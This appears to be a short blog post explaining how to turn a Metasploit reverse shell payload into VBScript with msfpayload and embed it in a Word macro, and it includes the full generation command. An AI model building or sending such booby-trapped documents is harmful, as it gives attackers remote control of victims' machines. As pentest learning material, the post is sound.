A few days ago, I saw this small video posted by John Strand from PSW about the V option in msfpayload and the EXE2VBS tool. As always, his videos are extremely interesting (although he does talk pretty fast in this one). Pauldotcom Ep 161
So basically this a client side attack, and in my opinion at pretty nasty one too. Every time I've seen someone open up a word document, or excel spreadsheet, either downloaded off the Web or received via e-mail. 99% of the time people either let the macros run or already have the security settings set to low.
What does this mean? Well using the "V" option in msfpayload will output the payload as a vbscript. Then all one needs to do is insert it in a Word document. Once the file is opened, the payload is executed (provided the macro runs of course).
I've actually tried it, and it's pretty funny (and scary) getting a revese shell because I opened a Word document.
So here's a quick example of the syntax. If you are not familiar with Metasploit, I suggest you visit their site.
From your machine with the Metasploit framework installed:
bt framework3 # ./msfpayload windows/shell_reverse_tcp LHOST=10.1.10.53 V > /tmp/vbrshell.bas
Once the file is created, just insert that in a nice Word document..
Here's another video posted by Mark Baggett which explains the process.
Have fun, and remember to only use this on your local network or with permission of the person to whom you'll be sending such a file.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment